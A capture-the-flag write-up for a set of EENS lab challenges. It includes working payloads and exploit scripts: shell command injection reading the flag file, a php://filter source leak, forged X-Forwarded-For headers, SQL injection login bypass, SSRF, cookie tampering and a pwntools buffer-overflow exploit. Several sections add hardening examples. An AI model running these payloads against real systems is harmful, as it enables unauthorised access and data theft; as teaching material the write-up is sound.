
CTF write-up: EENS

Ping

  • url: http://eens.ee.ncku.edu.tw:5104/
  • payload:
```
127.0.0.1 | cat flag/flag.txt
```
  • detail: the same injection dumps the source with `127.0.0.1 | cat app.py`; the app is a Python 2 Flask script:
```python
from flask import Flask, render_template, request, url_for
import subprocess

app = Flask(__name__)

@app.route('/')
def home():
    return render_template('home.html')

@app.route('/', methods=['POST'])
def webshell():
    command = request.form['command']
    # Intended as a blacklist, but ("vi" or ">") is evaluated first and is just
    # the string "vi", so only "vi" is ever checked; "|", ";", "&&", "`" and ">"
    # all get through.
    if ("vi" or ">") in command:
        output = "your command is error!!!What are you trying to do!!!"
    else:
        try:
            # User input concatenated into a shell=True command string: command injection.
            output = subprocess.check_output("ping -c1 " + command,
                                             stderr=subprocess.STDOUT, shell=True)
            print output
        except Exception as e:
            output = "your command is error!!!What are you trying to do!!!"
    return render_template('home.html', allCarbDiet=output)

if __name__ == '__main__':
    app.run(host='0.0.0.0', port=80)
```
  • details:
    • The page shows a single input for the address to ping
    • Guess that the backend hands it to something like subprocess
    • First try `127.0.0.1 | ls` to confirm that a pipe `|` gets past the filter
    • Use the payload above to read the flag
  • flag:EENS{4fbaf3a4a7abdb459fc4f95fcbafb2dae920132583862c08eb4403037606e708}
tags: bypass
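The filter in app.py fails for a reason worth spelling out: `("vi" or ">")` is evaluated before `in`, and `"vi" or ">"` is simply the string `"vi"`, so nothing but `vi` is ever blocked. The block below is an added example (not code from the challenge or from this write-up) that reproduces that check beside a hardened version: the ping target is validated against an allow-list (a literal IP address or a plain hostname) and passed to `subprocess.run` as one argv element with no shell, so metacharacters are never interpreted. The hostname regex and the function names are my own.

```python
import ipaddress
import re
import subprocess

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens,
# no label starting or ending with a hyphen, 253 characters at most.
HOSTNAME_RE = re.compile(
    r'(?=.{1,253}\Z)'
    r'[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?'
    r'(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*\Z'
)


def original_filter_blocks(command):
    """The challenge's check, reproduced verbatim.

    ("vi" or ">") evaluates to "vi", so this only ever looks for "vi";
    "|", ";", "&&", "`" and ">" all pass.
    """
    return ("vi" or ">") in command


def is_safe_target(target):
    """Allow-list validation: a literal IPv4/IPv6 address or a plain hostname, nothing else."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return HOSTNAME_RE.match(target) is not None


def build_ping_argv(target):
    """Return the argv for one probe, or raise ValueError.

    The target is its own argv element and no shell is involved, so even a
    target that slipped past validation could not chain a second command.
    """
    if not is_safe_target(target):
        raise ValueError("refusing ping target: %r" % (target,))
    return ['ping', '-c', '1', target]


def run_ping(target, timeout=10):
    """Hardened replacement for check_output("ping -c1 " + command, shell=True)."""
    result = subprocess.run(build_ping_argv(target), capture_output=True,
                            text=True, timeout=timeout)
    return result.stdout + result.stderr


if __name__ == '__main__':
    injected = '127.0.0.1 | cat flag/flag.txt'
    print('original filter blocks the payload:', original_filter_blocks(injected))
    print('hardened validator accepts the payload:', is_safe_target(injected))
    print('argv for a legitimate target:', build_ping_argv('eens.ee.ncku.edu.tw'))
```

`run_ping` is the only function that touches the network; the checks themselves are pure, so they can be unit-tested against every payload from the write-up without a ping binary.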

EZPHP

  • url: eens.ee.ncku.edu.tw:5006
  • payload: php://filter/read=convert.base64-encode/resource=index.php
    • result
PCFET0NUWVBFIGh0bWw+ICAgICAKPGhlYWQ+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PXV0Zi04Ij4KPC9oZWFkPgogICAgPGJvZHk+CiAgICAgICAgPHA+R2V0IG1lIGEgZmlsZSBuYW1lLCBJJ2xsIHJlYWQgdGhlIGZpbGUgZm9yIHlvdSAhPC9wPgoJCTxwIHN0eWxlPSJjb2xvcjpncmF5OyI+ICogVHJ5IDEudHh0IDwvcD4KPGZvcm0gYWN0aW9uPSJpbmRleC5waHAiIG1ldGhvZD0icG9zdCI+CllvdXIgaW5wdXQ6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJpbnB1dCIgLz4K44CAPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0i6YCB5Ye66KGo5ZauIi8+CjwvZm9ybT4KCjw/cGhwCi8vIFRoZSBmbGFnIGZvciBFWnBocCBpcyBFRU5TezNjY2JkN2I1NWU2N2EwOWJjMDg1ZTMyZjZhNzllMmNmZGZlMDNlODUyNWFlMmUyN2M5MmE2NDZjNjc5YmYwMGN9CgokaXAgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsKaWYgKCRpcCA9PSAnMTI3LjAuMC4xJyl7CiAgICAvLyA1NVJmXzEKICAgICRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoImZsYWdWR2hwYzBselFVWnNZV2REWVc1dWIzUkNaVVp2ZFc1ayIpOwogICAgZWNobyAkY29udGVudDsKfQplbHNlaWYoJF9TRVJWRVJbIkhUVFBfQ0xJRU5UX0lQIl09PScxMjcuMC4wLjEnICYmICRfU0VSVkVSWyJIVFRQX1hfRk9SV0FSREVEX0ZPUiJdID09JzEyNy4wLjAuMScpewogICAgLy8gNTVSZl8yCiAgICAkY29udGVudCA9IGZpbGVfZ2V0X2NvbnRlbnRzKCJmbGFnU1dSdmJuUjNZVzUwZVc5MWEyNXZkdz09Iik7CiAgICBlY2hvICRjb250ZW50Owp9CmVsc2V7CiAgICAkaW5wdXQgIC49ICAkX1BPU1QgWyAnaW5wdXQnIF07CiAgICAkZmlsZW5hbWUgPSB0cmltKCRpbnB1dCk7CiAgICBpZiAoc3RycG9zKCRpbnB1dCwgJ2ZsYWcnKSAhPT0gZmFsc2UpewogICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIGVjaG8gIllvdSBhcmUgYSBiYWQgaGFja2VyICEhISI7CiAgICB9CiAgICBlbHNlewogICAgICAgICRjb250ZW50ID0gZmlsZV9nZXRfY29udGVudHMoJGZpbGVuYW1lKTsKICAgICAgICBpZiAocHJlZ19tYXRjaCgiL2ZsYWcvaSIsICRjb250ZW50KSl7CgkJCWVjaG8gIjxicj4iOwogICAgICAgICAgICBlY2hvICJZb3UgYXJlIGEgYmFkIGhhY2tlciAhISEiOwogICAgICAgIH0KICAgICAgICBlbHNlewogICAgICAgICAgICBlY2hvICI8YnI+IjsKICAgICAgICAgICAgZWNobyAkY29udGVudDsKICAgICAgICB9CiAgICAgICAgCiAgICB9Cn0KPz4KICAgIDwvYm9keT4KCjwvaHRtbD4K
  • base64 decode (the `55Rf_1` / `55Rf_2` branches are the next two challenges: a request that really comes from localhost, and the `Client-IP` / `X-Forwarded-For` header pair)
```php
<!DOCTYPE html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
</head>
    <body>
        <p>Get me a file name, I'll read the file for you !</p>
        <p style="color:gray;"> * Try 1.txt </p>
<form action="index.php" method="post">
Your input: <input type="text" name="input" />
　<input type="submit" name="送出表單"/>
</form>

<?php
// The flag for EZphp is EENS{3ccbd7b55e67a09bc085e32f6a79e2cfdfe03e8525ae2e27c92a646c679bf00c}

$ip = $_SERVER["REMOTE_ADDR"];
if ($ip == '127.0.0.1'){
    // 55Rf_1
    $content = file_get_contents("flagVGhpc0lzQUZsYWdDYW5ub3RCZUZvdW5k");
    echo $content;
}
elseif($_SERVER["HTTP_CLIENT_IP"]=='127.0.0.1' && $_SERVER["HTTP_X_FORWARDED_FOR"] =='127.0.0.1'){
    // 55Rf_2
    $content = file_get_contents("flagSWRvbnR3YW50eW91a25vdw==");
    echo $content;
}
else{
    $input  .=  $_POST [ 'input' ];
    $filename = trim($input);
    if (strpos($input, 'flag') !== false){
        echo "<br>";
        echo "You are a bad hacker !!!";
    }
    else{
        $content = file_get_contents($filename);
        if (preg_match("/flag/i", $content)){
            echo "<br>";
            echo "You are a bad hacker !!!";
        }
        else{
            echo "<br>";
            echo $content;
        }
    }
}
?>
    </body>

</html>
```
  • flag: EENS{3ccbd7b55e67a09bc085e32f6a79e2cfdfe03e8525ae2e27c92a646c679bf00c}
tags: pseudo protocol php
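Why the `php://filter` payload works: index.php blacklists the string `flag` twice, once in the requested filename and once in the bytes it reads back, and the source itself contains `flag` in a comment, so asking for `index.php` directly is refused. A read filter transforms the bytes before the second check sees them, so any encoding the wrapper offers (base64, rot13, ...) slips past, and the client simply decodes the result. The block below is an added example, not the challenge's code: it models `file_get_contents()` with a small subset of PHP's stream filters and reproduces the two checks from the decoded index.php. `FILES`, its placeholder flag and the function names are constructed for the demonstration.

```python
import base64
import codecs
import re

# Constructed stand-in for the target's document root. The flag is a placeholder,
# not the real one from the challenge.
FILES = {
    'index.php': "<?php\n// The flag for EZphp is EENS{placeholder}\n"
                 "$content = file_get_contents(trim($_POST['input']));\n?>\n",
    '1.txt': "nothing to see here\n",
}

# The subset of PHP stream filters modelled here (PHP ships many more).
FILTERS = {
    'convert.base64-encode': base64.b64encode,
    'convert.base64-decode': base64.b64decode,
    'string.rot13': lambda b: codecs.encode(b.decode('latin-1'), 'rot_13').encode('latin-1'),
    'string.toupper': bytes.upper,
}


def php_filter_read(target, files=FILES):
    """Model of file_get_contents(): a plain path, or the php://filter wrapper.

    php://filter/read=<f1>|<f2>/resource=<path> reads <path> and pipes the bytes
    through each named filter in order before handing them back to the caller.
    """
    if not target.startswith('php://filter/'):
        return files[target].encode('latin-1')
    spec = target[len('php://filter/'):]
    chain, sep, resource = spec.partition('/resource=')
    if not sep:
        raise ValueError('php://filter needs a resource=')
    data = files[resource].encode('latin-1')
    if chain.startswith('read='):
        for name in chain[len('read='):].split('|'):
            data = FILTERS[name](data)
    return data


def ezphp_read(user_input, files=FILES):
    """The two blacklist checks from the decoded index.php, reproduced in Python."""
    filename = user_input.strip()
    if 'flag' in user_input:                      # strpos($input, 'flag') !== false
        return 'You are a bad hacker !!!'
    content = php_filter_read(filename, files).decode('latin-1')
    if re.search('flag', content, re.I):          # preg_match("/flag/i", $content)
        return 'You are a bad hacker !!!'
    return content


def leak_source(files=FILES):
    """Request the base64-encoded source and decode it locally, as the payload above does."""
    encoded = ezphp_read('php://filter/read=convert.base64-encode/resource=index.php', files)
    return base64.b64decode(encoded).decode('latin-1')


if __name__ == '__main__':
    print(ezphp_read('index.php'))          # refused: the source contains "flag"
    print(leak_source())                    # full source, flag comment included
```

The lesson generalises: a blacklist on returned content only constrains the encoding the attacker happens to pick; the fix is to resolve the requested name against an allow-list of files before calling `file_get_contents()` at all.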

EZphp_2

  • Header forge: add the two headers the `55Rf_2` branch compares against `127.0.0.1` (`$_SERVER["HTTP_CLIENT_IP"]` is the `Client-IP` header)
```http
X-Forwarded-For: 127.0.0.1
Client-IP: 127.0.0.1
```
  • flag: EENS{868ff5b3432facbfab5a5657aaaf7f96301b673acb532236398e1d05b26380c6}
tags: Header X-Forwarded-For Burp suite

Try to Login

  • url: http://eens.ee.ncku.edu.tw:5101
  • payload:
1' or '1'='1
  • flag: EENS{cf2d891cb01a75a806ca50d6d5cb3f7af532534bb649ab1fa1f11464982419f8}
tags: sql injection bypass

EZphp_3

  • payload: http://127.0.0.1
    • `file_get_contents()` also fetches URLs when `allow_url_fopen` is on (it was here), so giving the page its own address as the "file name" makes the server request itself; that request arrives with `REMOTE_ADDR` 127.0.0.1 and takes the `55Rf_1` branch, which prints the flag
  • flag: EENS{ae852e946757b0a32f386aeba991abae99c25d3ed4514fd1dfe0ebe43ab653c6}
tags: ssrf
  • url: http://eens.ee.ncku.edu.tw:5102
  • solution:
    • use Burp Suite
    • change the `level` cookie from user to admin; the server trusts this client-side value for authorization
```http
GET /fonts/font-awesome-4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1
Host: eens.ee.ncku.edu.tw:5102
Accept: */*
Connection: close
Cookie: level: admin; session=0ba64634-7efd-4ee3-8052-7de342d7db3d.taDtAHyw_ixod5mf6Q7NVuWRaZg; _ga=GA1.3.666780538.1583373154; _gid=GA1.3.729447486.1584775510; s_pers=%20c19%3Dpr%253Apure%2520portal%253Apersons%253Aview%7C1584262262181%3B%20v68%3D1584260460625%7C1584262262186%3B%20v8%3D1584260581398%7C1678868581398%3B%20v8_s%3DMore%2520than%252030%2520days%7C1584262381398%3B; AMCV_4D6368F454EC41940A4C98A6%40AdobeOrg=-432600572%7CMCIDTS%7C18337%7CMCMID%7C34021734364032204804614156171821970172%7CMCAID%7CNONE%7CMCOPTOUT-1584267662s%7CNONE%7CMCAAMLH-1584865262%7C11%7CMCAAMB-1584865262%7Cj8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI%7CMCSYNCSOP%7C411-18344%7CvVersion%7C4.5.2; s_fid=0B3F668660A8EC43-1554906741E9BCDC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.4 Safari/605.1.15
Accept-Language: zh-tw
Referer: http://eens.ee.ncku.edu.tw:5102/
Accept-Encoding: gzip, deflate
```
  • flag: EENS{35ee65df86b64dbb411fa3b6b803117844819e12f8372ebec139107738527506}

Hello_CTF

  • copy paste
  • flag: EENS{HeL10_C7f}

Guess a password

  • strings rn.png
  • flag: EENS{Senbonzakura_Kageyoshi}
tags: strings

sha1

  • connecting and sending nothing shows what the service is: a PyInstaller-packaged Python 2 script (`raw_input`, "Failed to execute script") that reads two secrets
```
Input first secret:
Input second secret:
Traceback (most recent call last):
  File "sha1.py", line 16, in <module>
    secret_2 = str(raw_input())
EOFError: EOF when reading a line
[21] Failed to execute script sha1
```
  • exploit: the two secrets evidently have to differ but share a SHA-1, which is exactly what the SHAttered PDFs provide
```python
from pwn import *
import hashlib
import base64

# shattered-1.pdf and shattered-2.pdf are the SHAttered collision pair (shattered.io):
# different bytes, identical SHA-1 38762cf7f55934b34d179ae6a4c80cadccbb7f0a.
f1 = open('shattered-1.pdf', 'rb').read()
f2 = open('shattered-2.pdf', 'rb').read()
assert f1 != f2
print(hashlib.sha1(f1).hexdigest())   # hash each file separately
print(hashlib.sha1(f2).hexdigest())   # same digest as f1

conn = remote('140.116.215.203', 5001)
conn.recvuntil(b'Input first secret:')
conn.sendline(base64.b64encode(f1))
conn.recvuntil(b'Input second secret:')
conn.sendline(base64.b64encode(f2))
conn.interactive()
```
  • flag: EENS{974c7afceb5175b6b17ae7017827b6a6e8027c172dcb80cf53e52829f9cd222a}

Translate Me

  • exploit: cipher.txt is a tabula recta (three header lines, then one row per key letter); for each position, find the ciphertext letter in the key letter's row and the column index is the plaintext letter
```python
cipher = 'MHBFOBNMAOPSQWDVSFCUACSTBDRMOMSKGRZQHALJRNJSRRGLSREUFSLC'
key    = 'IDONTTHINKYOOOOOOOUCANSLOVETHISSOJUSTGIVEUPANDTAKEABREAK'
dic = {}
base = 64          # column index 1 -> chr(65) == 'A'
f = open('cipher.txt')


def decode(dic, c, k):
    """Ciphertext letter c in the row for key letter k; the column is the plaintext."""
    i = dic[k].index(c)
    i += base
    return chr(i)


[print(f.readline()) for i in range(3)]      # skip the three header lines
for i in range(26):                          # rows look like "K|A B C ... Z"
    tmp = f.readline()
    tmp = tmp.split('|')
    dic[tmp[0]] = tmp[1].replace('\n', '').split(' ')
f.close()

flag = ''
for c, k in zip(cipher, key):
    if c == '{' or c == ' ' or c == '}':
        flag += c
    else:
        flag += decode(dic, c, k)
print(flag)
```
  • flag: EENS{VIGENERE CIPHER IS A PAIN IN THE ASS IF YOU DONT USE ONLINE TOOLS}

You can't type

Could you login?

  • pwn_1.c
```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Globals sit next to each other in .bss: pass[10] is directly followed by allow[4]
   in this binary, which is what the exploit relies on. */
char acc[10];
char pass[10];
char allow[4];

int main()
{
    strcpy(allow, "no");
    FILE *fd = fopen("secret.txt", "r");
    char username[10], password[10], flag[256];
    fscanf(fd, "%s", username);
    fscanf(fd, "%s", password);
    fscanf(fd, "%s", flag);
    printf("Username: \n");
    fflush(stdout);
    scanf("%s", acc);        /* %s has no length limit: writes past acc[10] */
    fflush(stdout);
    printf("Password: \n");
    fflush(stdout);
    scanf("%s", pass);       /* same here: bytes 10.. land in allow[] */
    fflush(stdout);
    if ((!strcmp(acc, username)) && !(strcmp(pass, password)))
        strcpy(allow, "yes");
    if (!strcmp(allow, "yes"))
        printf("Nice!\n%s\n", flag);
    else
        printf("You are bad guy so you cannot access!\n");
    fflush(stdout);
    return 0;
}
```
```python
from pwn import *

conn = remote('140.116.215.203', 5201)
conn.recvuntil(b'Username:')
conn.sendline(b'a')
conn.recvuntil(b'Password:')
# 10 bytes fill pass[10]; the next four, "yes\0", overwrite allow[4],
# so the final strcmp(allow, "yes") succeeds without knowing the password.
conn.sendline(b'b' * 10 + b'yes')
conn.interactive()
```
  • a classic buffer overflow: `scanf("%s")` never checks the length, so 13 bytes written into `pass[10]` spill `yes` into the adjacent `allow` and the credential check is bypassed entirely
  • flag: EENS{7his_Is_a_Simp1e_Buffer_0VERF1ow_practice.}
tags: overflow

God of Mental Arithmetic

  • exploit: answer 100 questions of the form `a + b = ?` / `a - b = ?`
```python
from pwn import *


def solve(q):
    """Strip '?', spaces and '=' then evaluate the remaining 'a+b' or 'a-b'."""
    q = q.replace('?', '').replace(' ', '').replace('=', '')
    if '+' in q:
        Q = q.split('+')
        return str(int(Q[0]) + int(Q[1]))
    Q = q.split('-')
    return str(int(Q[0]) - int(Q[1]))


conn = remote('140.116.215.203', 5005)
for i in range(100):
    conn.recv()
    q = conn.recv().decode('utf-8').split('\n')[-2]   # the question is the last full line
    conn.sendline(solve(q).encode())
conn.interactive()
```
  • flag: EENS{a52e4d6f04166133d4e3e70aeec1e393d6c8dafdd0de138c51cf7be64483ffb6}

Eat more and more

  • given a.out
    • description: get 500 to win
  • reverse with Ghidra: the score is kept in a global named `scores`
  • gdb: break, run, look up the symbol's address and write 500 (the win threshold) into it
```
(gdb) b main
(gdb) r
# prints the address of the global scores
(gdb) info address scores
# use that address here
(gdb) set {int}<address> = 500
(gdb) c
```
  • flag: EENS{Be_Patient_AND_ENJOY_THIS_GAME!!!!}
tags: ghidra gdb reverse

Kids doodle

  • the image does not open: its PNG signature is damaged. The signature is `89 50 4E 47 0D 0A 1A 0A` and byte 2 (`N`) was wrong, so put it back:
```python
with open('flag.png', 'rb') as f:
    data = bytearray(f.read())
data[2] = 0x4E          # 'N' of the PNG signature 89 50 4E 47 0D 0A 1A 0A
with open('exploit.png', 'wb') as f:
    f.write(data)
```
  • the repaired file is a QR code that decodes to: RUVOU3tsYXM7ZG4sbXp3a2VqdGtzenguY252enhjdn0=
  • base64 decode
  • flag: EENS{las;dn,mzwkejtkszx.cnvzxcv}

tags: forensics magic number
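The one-byte fix above assumes you already know which byte is wrong. As an added example (not from the write-up), the block below generalises it: compare the header against a few well-known signatures, pick the format with the fewest damaged bytes, rewrite only those bytes, and sanity-check that a PNG's first chunk is a 13-byte `IHDR`. The signature table, the `GOOD_HEADER` / `DAMAGED_HEADER` samples and the function names are constructed for the example.

```python
# Well-known file signatures (magic numbers) at offset 0.
SIGNATURES = {
    'png': bytes.fromhex('89504e470d0a1a0a'),
    'jpeg': bytes.fromhex('ffd8ff'),
    'gif': b'GIF8',
    'zip': bytes.fromhex('504b0304'),
    'pdf': b'%PDF-',
}


def signature_mismatches(data, signature):
    """Header bytes that disagree with the signature, as (offset, found, expected)."""
    return [(i, data[i], signature[i])
            for i in range(min(len(signature), len(data)))
            if data[i] != signature[i]]


def guess_format(data, max_wrong=2):
    """Pick the format whose signature has the fewest damaged bytes (at most max_wrong)."""
    best = None
    for name, sig in SIGNATURES.items():
        if len(data) < len(sig):
            continue
        wrong = len(signature_mismatches(data, sig))
        if wrong <= max_wrong and (best is None or wrong < best[1]):
            best = (name, wrong)
    return best[0] if best else None


def repair_signature(data, fmt=None):
    """Return a copy of data with the header rewritten to the guessed (or given) signature."""
    fmt = fmt or guess_format(data)
    if fmt is None:
        raise ValueError('header does not resemble any known signature')
    fixed = bytearray(data)
    for offset, _, expected in signature_mismatches(data, SIGNATURES[fmt]):
        fixed[offset] = expected
    return bytes(fixed)


def png_ihdr_ok(data):
    """A PNG's first chunk must be a 13-byte IHDR immediately after the signature."""
    return data[8:16] == bytes.fromhex('0000000d') + b'IHDR'


def repair_file(src, dst):
    """Disk version: read src, fix its signature, write dst; returns what was changed."""
    with open(src, 'rb') as f:
        data = f.read()
    fmt = guess_format(data)
    with open(dst, 'wb') as f:
        f.write(repair_signature(data, fmt))
    return signature_mismatches(data, SIGNATURES[fmt])


# Constructed sample: a PNG header whose third signature byte ('N') was zeroed,
# the same kind of damage the flag.png fix above repairs by hand.
GOOD_HEADER = SIGNATURES['png'] + bytes.fromhex('0000000d') + b'IHDR'
DAMAGED_HEADER = GOOD_HEADER[:2] + b'\x00' + GOOD_HEADER[3:]

if __name__ == '__main__':
    print(guess_format(DAMAGED_HEADER), signature_mismatches(DAMAGED_HEADER, SIGNATURES['png']))
    print(repair_signature(DAMAGED_HEADER) == GOOD_HEADER, png_ihdr_ok(DAMAGED_HEADER))
```

`repair_file('flag.png', 'exploit.png')` is the drop-in equivalent of the script above; `max_wrong` keeps a thoroughly overwritten header from being mistaken for a short signature such as JPEG's three bytes.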

Go upstairs without elevator

  • exploit: every archive is named `a+b.zip`, its password is the sum `a+b`, and it contains the next archive in the chain, so loop until no new zip appears
```python
import os
import subprocess
from glob import glob

seen = {'./850+236.zip'}


def cal(path):
    """Password = sum of the two numbers in the file name, e.g. 850+236.zip -> 1086."""
    name = os.path.basename(path).split('.')[0]
    a, b = name.split('+')
    return str(int(a) + int(b))


def unzip(path):
    """Extract `path` with its computed password and return the zip it produced (or None)."""
    subprocess.run(['unzip', '-o', '-P', cal(path), path], check=True)
    for f in glob('./*.zip'):
        if f not in seen:
            seen.add(f)
            return f
    return None


target = './850+236.zip'
while target is not None:
    target = unzip(target)
```
  • flag: EENS{Th3r3_ls_th3_FIag_TEN50fTHOUSAND50f_STAGE5_AND_1I11l1ll1l1l1ll1lIIll1III1}

Chained Connie

  • exploit: each of the 30 search pages carries one piece of the flag in a `flag` response header
```python
import requests

flag = []
for i in range(0, 30):
    r = requests.get(f'http://eens.ee.ncku.edu.tw:5103/search?p={i}')
    flag.append(r.headers['flag'])
print(''.join(flag))
```
  • flag: EENS{Not_only_block_can_chain}

zip the zip

  • exploit
    • use https://github.com/Ethonwu/Zip-file-crack-using-dictionary
    • with rockyou.txt
    • password: zxcvbnm
  • flag: EENS{Whether_'tis_nobler_in_the_mind_to_suffer}